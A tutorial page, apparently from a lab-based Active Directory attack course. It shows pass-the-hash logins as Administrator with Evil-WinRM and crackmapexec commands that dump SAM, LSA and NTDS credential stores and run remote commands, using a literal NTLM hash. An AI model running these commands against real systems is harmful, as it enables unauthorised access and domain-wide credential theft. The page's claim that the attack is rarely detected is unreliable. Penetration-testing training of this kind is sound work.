> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-with-poison-and-relay/pass-the-hash-with-evil-winrm.md).

# Pass The Hash with Evil-Winrm

### Install Evil-Winrm

```
sudo apt install gem -y
sudo gem install evil-winrm -y

```

If WINRM is enabled on the endpoint, the awesome tool Evil-WinRm supports using hashes. This is a very silent attack and is not often caught by any security solutions.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

```
evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.11
hostname
ipconfig
whoami
menu
services

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.22
hostname
ipconfig
whoami
menu
services
```

```
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --sam
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --lsa
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --ntds


crackmapexec smb 192.168.56.11 -d north -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -x whoami
```
